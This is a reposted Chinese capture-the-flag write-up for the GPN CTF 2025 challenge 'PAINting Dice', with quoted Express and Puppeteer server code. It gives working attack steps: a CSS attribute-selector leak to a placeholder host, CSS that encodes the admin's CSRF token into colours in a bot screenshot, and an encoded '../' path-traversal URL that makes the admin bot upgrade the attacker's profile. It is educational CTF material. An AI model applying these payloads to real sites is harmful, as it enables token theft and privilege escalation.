当前位置: 首页 > news >正文

使用CSS泄露标签属性值 url路径遍历攻击 -- GPN CTF 2025 PAINting Dice

我们的目标是获得admin权限

// 升级profile API,只有管理员可用
sessionRouter.get('/api/upgrade/:profileId', requireCSRF, async (req, res, next) => {if (req.session.profileId !== 0) return res.render('error', { errorMsg: "You aren't a admin"});let profileIdParam = parseInt(req.params.profileId);if (profileIdParam === 0) return res.render('error', { errorMsg: "Can't upgrade the admin."});await db.upgradeProfile(profileIdParam);console.log("Profile upgraded")res.send("Profile upgraded.");
});// 获取flag,只有非管理员且有权限的用户可用
sessionRouter.get('/flag', noAdmin, async (req, res, next) => {let profileId = parseInt(req.session.profileId);if(!(await db.hasFlag(profileId))) return res.render('error', {errorMsg: "Sorry you don't have access to the flag."});res.send(flag);
});

服务器有以下过滤

// profile编辑API,带CSRF校验
sessionRouter.get("/api/profile/:profileId/edit", onlySelf, requireCSRF, noAdmin, async (req, res) => {let { style, html } = req.query;let customCSS = style ? String(style) : "";let customHTML = html ? String(html) : "";// 禁止css content属性if (customCSS.match(/content/i)) customCSS = ""; // I don't like css ::before and ::after content// 禁止闭合style标签if (customCSS.match(/<\s*\//i)) customCSS = ""; // Don't close the style tag// 过滤自定义HTML,禁止style标签customHTML = DOMPurify.sanitize(customHTML, {FORBID_TAGS: ['style']});if (customHTML.length > 2000 || customCSS.length > 2000) return res.render('error', {errorMsg: "Your html or style is to long."});// 更新数据库await db.updateProfile(req.session.profileId, customCSS, customHTML);res.redirect(`/profile/${req.session.profileId}`);
});

adminbot 存在一个漏洞profileId可以为任意内容

// 管理员访问profile,自动登录并截图
noSessionRouter.get('/admin/:profileId', async (req, res) => {try {let profileId = parseInt(req.params.profileId);// 这里profileId被重新赋值为字符串,可能是为了兼容profileId = req.params.profileId;// 启动puppeteer浏览器const browser = await puppeteer.launch({ executablePath: process.env.BROWSER, args: process.env.BROWSER_ARGS.split(',') });const page = await browser.newPage();// 管理员自动登录await page.goto(`http://localhost:1337/admin/login?adminToken=${adminToken}`);await new Promise(resolve => setTimeout(resolve, 1000));// 确保JS执行未被阻塞await page.waitForFunction('true');// 访问目标profile页面await page.goto('http://localhost:1337/profile/' + profileId);await new Promise(resolve => setTimeout(resolve, 1000));// 再次确保JS执行await page.waitForFunction('true');// 截图const screenshot = await page.screenshot();await browser.close();res.setHeader("Content-Type", "image/png");res.send(screenshot);} catch(e) {console.error(e); res.send("internal error :( pls report to admins")}
});

我立刻意识到可能可以控制特定参数造成xss,或削弱xss防御

ai向我描述了一种攻击方式,CSS选择器攻击,但是在本挑战中由于作用域的问题无法使用

<!DOCTYPE html>
<html>
<leak some="some">
<style>leak[some^="s"] { background-image: url('https://fake/yes_leak_some_begin_is_s'); }
</style>

将data-csrf转换为颜色,当管理员访问页面并截图时,攻击者从截图中提取颜色值

script{/* 从script标签的data-csrf属性获取CSRF token值并转为整数 */--rawToken: attr(data-csrf type(<integer>));/* 提取token的最低8位(0-255)作为背景色的蓝色通道值 */--background-blue: mod(var(--rawToken), 256);/* 移除已提取的最低8位,准备提取下一个字节 */--temp1: calc((var(--rawToken) - var(--background-blue)) / 256);/* 提取下一个8位作为背景色的绿色通道值 */--background-green: mod(var(--temp1), 256);/* 继续移除已提取的字节,提取下一个字节 */--temp2: calc((var(--temp1) - var(--background-green)) / 256);/* 提取背景色的红色通道值 */--background-red: mod(var(--temp2), 256);/* 继续移位操作,提取更高位的字节 */--temp3: calc((var(--temp2) - var(--background-red)) / 256);/* 提取边框色的蓝色通道值 */--font-blue: mod(var(--temp3), 256);/* 继续提取更高位的字节 */--temp4: calc((var(--temp3) - var(--font-blue)) / 256);/* 提取边框色的绿色通道值 */--font-green: mod(var(--temp4), 256);/* 提取最高字节作为边框色的红色通道 */--temp5: calc((var(--temp4) - var(--font-green)) / 256);--font-red: mod(var(--temp5), 256);/* 浏览器只支持32位整数,第一位是符号位,所以只使用31位 *//* 将边框色的绿色和红色通道强制设为0,防止溢出 */--font-green: 0;--font-red: 0;/* 根据提取的RGB值构建背景颜色 */--background-color: color(srgb calc(var(--background-red) / 255) calc(var(--background-green) / 255) calc(var(--background-blue) / 255));/* 根据提取的RGB值构建边框颜色 */--font-color: color(srgb calc(var(--font-red) / 255) calc(var(--font-green) / 255) calc(var(--font-blue) / 255));/* 将提取的颜色应用到元素上,使token可视化 */background-color: var(--background-color);border: 20px solid var(--font-color);/* 设置块元素显示,确保颜色区域足够大以便在截图中识别 */display: block;width: 500px;height: 500px;
}

管理员bot拼接url路径时未过滤 ../ 这允许我们进行url路径回退

// 管理员访问profile,自动登录并截图
noSessionRouter.get('/admin/:profileId', async (req, res) => {try {let profileId = parseInt(req.params.profileId);// 这里profileId被重新赋值为字符串,可能是为了兼容profileId = req.params.profileId;// 启动puppeteer浏览器const browser = await puppeteer.launch({ executablePath: process.env.BROWSER, args: process.env.BROWSER_ARGS.split(',') });const page = await browser.newPage();// 管理员自动登录await page.goto(`http://localhost:1337/admin/login?adminToken=${adminToken}`);await new Promise(resolve => setTimeout(resolve, 1000));// 确保JS执行未被阻塞await page.waitForFunction('true');// 访问目标profile页面await page.goto('http://localhost:1337/profile/' + profileId);await new Promise(resolve => setTimeout(resolve, 1000));// 再次确保JS执行await page.waitForFunction('true');// 截图const screenshot = await page.screenshot();await browser.close();res.setHeader("Content-Type", "image/png");res.send(screenshot);} catch(e) {console.error(e); res.send("internal error :( pls report to admins")}
});
{URL_PREFIX}/admin/{profile_id}%2F..%2F..%2F..%2F..%2F..%2Fapi%2Fupgrade%2F{profile_id}%3FcsrfToken%3D{leaked_csrf}
http://www.lryc.cn/news/575662.html

相关文章:

  • 【STL】深入理解 vector 的底层实现思想和使用
  • 东芝e-STUDIO 2323AMW双面复印报计数器溢出故障
  • 【CMake基础入门教程】第七课:查找并使用第三方库(以 find_package() 为核心)
  • [论文阅读] 人工智能+ | 用大语言模型给建筑合规检查“开挂“:BIM领域的自动化革命
  • python的银行柜台管理系统
  • Python 常用正则表达式大全
  • 【51单片机5毫秒定时器】2022-6-1
  • python打卡day43
  • 常见的排序方法
  • Jenkins 部署与使用
  • 在Visual Studio使用Qt的插件机制进行开发
  • Nordic nRF54L15 SoC对包含电池监测、中断处理和电源轨控制的定制 nPM1300 示例
  • UE Universal Camera 相机插件-限制镜头在区域内移动
  • 【Docker基础】Docker容器管理:docker restart详解
  • 使用Charles中文版抓包工具进行高效的API调试与性能优化
  • 【机器学习深度学习】线性代数
  • 网络分层模型与协议体系技术研究报告
  • PDF Kit 使用示例(HarmonyOS)
  • dockers virbox 安装
  • 亚矩阵云手机多开赋能Snapchat矩阵运营:技术原理与场景化破局
  • Linux修改uboot启动延时方法详细攻略,触觉智能RK3568开发板演示
  • Go语言与云原生:Kubernetes Operator开发全流程
  • 【钓鱼预警】HW主题,无需多言
  • LLM复杂记忆存储-多会话隔离案例实战
  • swiftUI iOS16和iOS15兼容
  • 设计模式 | 原型模式
  • 专线服务器具体是指什么?
  • Nginx配置文件介绍和基本使用
  • Excel处理控件Aspose.Cells教程:如何使用 Java 将图片添加到 Excel
  • 从零构建vue3项目(二)